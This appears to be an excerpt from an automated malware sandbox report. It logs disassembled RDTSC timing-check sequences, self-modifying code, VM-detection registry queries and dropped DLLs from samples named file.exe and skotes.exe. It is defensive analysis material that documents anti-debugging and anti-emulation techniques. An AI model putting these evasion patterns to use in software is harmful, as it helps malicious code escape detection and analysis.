Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	RDTSC instruction interceptor: First address: C6A1B0 second address: C6A20F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBE44B74B5Bh 0x00000009 popad 0x0000000a jng 00007FBE44B74B6Fh 0x00000010 jmp 00007FBE44B74B69h 0x00000015 popad 0x00000016 mov eax, dword ptr [esp+04h] 0x0000001a pushad 0x0000001b push eax 0x0000001c push ecx 0x0000001d pop ecx 0x0000001e pop eax 0x0000001f jmp 00007FBE44B74B69h 0x00000024 popad 0x00000025 mov eax, dword ptr [eax] 0x00000027 push eax 0x00000028 push edx 0x00000029 jnp 00007FBE44B74B58h 0x0000002f pushad 0x00000030 popad 0x00000031 rdtsc
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	RDTSC instruction interceptor: First address: C6A20F second address: C6A215 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	RDTSC instruction interceptor: First address: C6A215 second address: C6A231 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FBE44B74B56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 jp 00007FBE44B74B56h 0x00000019 push ecx 0x0000001a pop ecx 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	RDTSC instruction interceptor: First address: C6A3AD second address: C6A3B2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	RDTSC instruction interceptor: First address: C6A3B2 second address: C6A45E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 add dword ptr [esp], 31915BCBh 0x0000000e pushad 0x0000000f jmp 00007FBE44B74B66h 0x00000014 and ebx, 6BA367D3h 0x0000001a popad 0x0000001b push 00000003h 0x0000001d sub dword ptr [ebp+122D196Dh], ebx 0x00000023 push 00000000h 0x00000025 mov edx, dword ptr [ebp+122D2C99h] 0x0000002b push 00000003h 0x0000002d call 00007FBE44B74B5Dh 0x00000032 pushad 0x00000033 mov cx, 281Dh 0x00000037 movsx ecx, bx 0x0000003a popad 0x0000003b pop edx 0x0000003c call 00007FBE44B74B59h 0x00000041 jl 00007FBE44B74B71h 0x00000047 pushad 0x00000048 push esi 0x00000049 pop esi 0x0000004a jmp 00007FBE44B74B67h 0x0000004f popad 0x00000050 push eax 0x00000051 jne 00007FBE44B74B5Eh 0x00000057 mov eax, dword ptr [esp+04h] 0x0000005b jo 00007FBE44B74B62h 0x00000061 jnl 00007FBE44B74B5Ch 0x00000067 mov eax, dword ptr [eax] 0x00000069 push eax 0x0000006a push edx 0x0000006b push eax 0x0000006c push edx 0x0000006d pushad 0x0000006e popad 0x0000006f rdtsc
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	RDTSC instruction interceptor: First address: C6A45E second address: C6A462 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	RDTSC instruction interceptor: First address: C6A462 second address: C6A468 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	RDTSC instruction interceptor: First address: C6A468 second address: C6A4E5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007FBE451FC089h 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 jnl 00007FBE451FC076h 0x0000001e lea ebx, dword ptr [ebp+1245EFF5h] 0x00000024 push 00000000h 0x00000026 push ecx 0x00000027 call 00007FBE451FC078h 0x0000002c pop ecx 0x0000002d mov dword ptr [esp+04h], ecx 0x00000031 add dword ptr [esp+04h], 00000017h 0x00000039 inc ecx 0x0000003a push ecx 0x0000003b ret 0x0000003c pop ecx 0x0000003d ret 0x0000003e and edx, dword ptr [ebp+122D268Eh] 0x00000044 xchg eax, ebx 0x00000045 jmp 00007FBE451FC084h 0x0000004a push eax 0x0000004b jbe 00007FBE451FC084h 0x00000051 push eax 0x00000052 push edx 0x00000053 push eax 0x00000054 push edx 0x00000055 rdtsc
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	RDTSC instruction interceptor: First address: C6A4E5 second address: C6A4E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	RDTSC instruction interceptor: First address: C6A535 second address: C6A539 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	RDTSC instruction interceptor: First address: C7AABE second address: C7AAC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	RDTSC instruction interceptor: First address: C7AAC2 second address: C7AAC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	RDTSC instruction interceptor: First address: C7AAC8 second address: C7AAD2 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FBE44B74B5Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	RDTSC instruction interceptor: First address: C884A6 second address: C884D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBE451FC07Eh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FBE451FC086h 0x00000011 rdtsc
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	RDTSC instruction interceptor: First address: C884D1 second address: C884DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	RDTSC instruction interceptor: First address: C884DC second address: C884E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	RDTSC instruction interceptor: First address: C884E0 second address: C884FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FBE44B74B5Bh 0x0000000d push eax 0x0000000e push edx 0x0000000f ja 00007FBE44B74B56h 0x00000015 rdtsc
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	RDTSC instruction interceptor: First address: C887C2 second address: C887C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	RDTSC instruction interceptor: First address: C88936 second address: C8893C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	RDTSC instruction interceptor: First address: C8893C second address: C88940 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	RDTSC instruction interceptor: First address: C88940 second address: C88946 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	RDTSC instruction interceptor: First address: C88AA1 second address: C88AA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	RDTSC instruction interceptor: First address: C88AA5 second address: C88AD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FBE44B74B5Bh 0x0000000b jbe 00007FBE44B74B72h 0x00000011 jmp 00007FBE44B74B66h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	RDTSC instruction interceptor: First address: C89044 second address: C8905C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBE451FC07Fh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	RDTSC instruction interceptor: First address: C89190 second address: C89194 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	RDTSC instruction interceptor: First address: C50CEF second address: C50D05 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007FBE451FC076h 0x0000000a jmp 00007FBE451FC07Ch 0x0000000f rdtsc
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	RDTSC instruction interceptor: First address: C50D05 second address: C50D12 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push edi 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	RDTSC instruction interceptor: First address: C50D12 second address: C50D24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c jbe 00007FBE451FC076h 0x00000012 rdtsc
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	RDTSC instruction interceptor: First address: C89A7A second address: C89A7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	RDTSC instruction interceptor: First address: C89A7E second address: C89A9C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBE451FC086h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	RDTSC instruction interceptor: First address: C89A9C second address: C89AAC instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FBE44B74B56h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	RDTSC instruction interceptor: First address: C89C47 second address: C89C4E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	RDTSC instruction interceptor: First address: C8E7E3 second address: C8E80F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBE44B74B5Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FBE44B74B67h 0x00000011 rdtsc
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	RDTSC instruction interceptor: First address: C8F98F second address: C8F994 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	RDTSC instruction interceptor: First address: C8F994 second address: C8F999 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	RDTSC instruction interceptor: First address: C96ECD second address: C96ED2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	RDTSC instruction interceptor: First address: C96ED2 second address: C96EDE instructions: 0x00000000 rdtsc 0x00000002 jc 00007FBE44B74B5Eh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	RDTSC instruction interceptor: First address: C96EDE second address: C96EE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	RDTSC instruction interceptor: First address: C96443 second address: C96463 instructions: 0x00000000 rdtsc 0x00000002 je 00007FBE44B74B56h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jc 00007FBE44B74B5Ch 0x00000012 jns 00007FBE44B74B56h 0x00000018 push eax 0x00000019 pushad 0x0000001a popad 0x0000001b pop eax 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	RDTSC instruction interceptor: First address: C96463 second address: C96469 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	RDTSC instruction interceptor: First address: C96469 second address: C9646D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	RDTSC instruction interceptor: First address: C9646D second address: C96471 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	RDTSC instruction interceptor: First address: C96616 second address: C9661A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	RDTSC instruction interceptor: First address: C9661A second address: C96620 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	RDTSC instruction interceptor: First address: C96797 second address: C967A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	RDTSC instruction interceptor: First address: C967A1 second address: C967A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	RDTSC instruction interceptor: First address: C967A6 second address: C967AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	RDTSC instruction interceptor: First address: C967AC second address: C967CF instructions: 0x00000000 rdtsc 0x00000002 jo 00007FBE451FC076h 0x00000008 jmp 00007FBE451FC07Fh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jc 00007FBE451FC076h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	RDTSC instruction interceptor: First address: C967CF second address: C967D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	RDTSC instruction interceptor: First address: C96A6A second address: C96A6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	RDTSC instruction interceptor: First address: C96A6E second address: C96A72 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	RDTSC instruction interceptor: First address: C96A72 second address: C96A93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FBE451FC076h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d jmp 00007FBE451FC081h 0x00000012 push edx 0x00000013 pop edx 0x00000014 pop esi 0x00000015 rdtsc
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	RDTSC instruction interceptor: First address: C96C0C second address: C96C2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 pushad 0x00000009 jmp 00007FBE44B74B62h 0x0000000e push eax 0x0000000f push edx 0x00000010 push edi 0x00000011 pop edi 0x00000012 rdtsc
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	RDTSC instruction interceptor: First address: C96C2B second address: C96C31 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	RDTSC instruction interceptor: First address: C976C8 second address: C976E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 mov eax, dword ptr [esp+04h] 0x00000009 jmp 00007FBE44B74B5Bh 0x0000000e mov eax, dword ptr [eax] 0x00000010 push edi 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	RDTSC instruction interceptor: First address: C976E3 second address: C976E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	RDTSC instruction interceptor: First address: C976E7 second address: C976EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	RDTSC instruction interceptor: First address: C976EB second address: C97700 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b jnc 00007FBE451FC088h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	RDTSC instruction interceptor: First address: C97700 second address: C97704 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	RDTSC instruction interceptor: First address: C97704 second address: C97746 instructions: 0x00000000 rdtsc 0x00000002 js 00007FBE451FC076h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b push 00000000h 0x0000000d push eax 0x0000000e call 00007FBE451FC078h 0x00000013 pop eax 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 add dword ptr [esp+04h], 00000018h 0x00000020 inc eax 0x00000021 push eax 0x00000022 ret 0x00000023 pop eax 0x00000024 ret 0x00000025 jmp 00007FBE451FC07Dh 0x0000002a push CBCBA58Dh 0x0000002f pushad 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	RDTSC instruction interceptor: First address: C97746 second address: C9774A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	RDTSC instruction interceptor: First address: C97D8E second address: C97D9F instructions: 0x00000000 rdtsc 0x00000002 jng 00007FBE451FC076h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	RDTSC instruction interceptor: First address: C97D9F second address: C97DA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	RDTSC instruction interceptor: First address: C97E76 second address: C97E80 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007FBE451FC076h 0x0000000a rdtsc
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	RDTSC instruction interceptor: First address: C97E80 second address: C97EA0 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FBE44B74B56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FBE44B74B5Fh 0x00000016 rdtsc
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	RDTSC instruction interceptor: First address: C97EA0 second address: C97EA6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	RDTSC instruction interceptor: First address: C97EA6 second address: C97EAB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	RDTSC instruction interceptor: First address: C98359 second address: C9835D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	RDTSC instruction interceptor: First address: C983E0 second address: C983E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	RDTSC instruction interceptor: First address: C985CF second address: C985D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	RDTSC instruction interceptor: First address: C986AB second address: C986AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	RDTSC instruction interceptor: First address: C986AF second address: C986B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	RDTSC instruction interceptor: First address: C987F4 second address: C987F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	RDTSC instruction interceptor: First address: C988CB second address: C988E8 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FBE451FC082h 0x00000010 rdtsc
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	RDTSC instruction interceptor: First address: C988E8 second address: C9893C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FBE44B74B69h 0x00000008 push esi 0x00000009 pop esi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push ebp 0x00000011 call 00007FBE44B74B58h 0x00000016 pop ebp 0x00000017 mov dword ptr [esp+04h], ebp 0x0000001b add dword ptr [esp+04h], 0000001Bh 0x00000023 inc ebp 0x00000024 push ebp 0x00000025 ret 0x00000026 pop ebp 0x00000027 ret 0x00000028 mov dword ptr [ebp+122D30A3h], edx 0x0000002e mov esi, edx 0x00000030 push eax 0x00000031 pushad 0x00000032 pushad 0x00000033 push ecx 0x00000034 pop ecx 0x00000035 push eax 0x00000036 push edx 0x00000037 rdtsc
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	RDTSC instruction interceptor: First address: C9893C second address: C98945 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	RDTSC instruction interceptor: First address: C99DBC second address: C99DC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	RDTSC instruction interceptor: First address: C99DC0 second address: C99DD8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007FBE451FC082h 0x0000000c rdtsc
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	RDTSC instruction interceptor: First address: C99DD8 second address: C99DDE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	RDTSC instruction interceptor: First address: C99DDE second address: C99DE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	RDTSC instruction interceptor: First address: C99DE4 second address: C99DE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 33FBFA instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 33FCD9 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 50D54F instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 56CEE7 instructions caused by: Self-modifying code
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	Special instruction interceptor: First address: ADEAC8 instructions caused by: Self-modifying code
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	Special instruction interceptor: First address: C8DFAE instructions caused by: Self-modifying code
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	Special instruction interceptor: First address: CB7FE5 instructions caused by: Self-modifying code
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	Special instruction interceptor: First address: D1D70A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: ACEAC8 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: C7DFAE instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: CA7FE5 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: D0D70A instructions caused by: Self-modifying code

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion

Source: C:\Users\user\DocumentsDBKKKEHDHC.exe

Code function: 27_2_04C20B4C rdtsc

27_2_04C20B4C

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\random[1].exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\freebl3[1].dll	Jump to dropped file
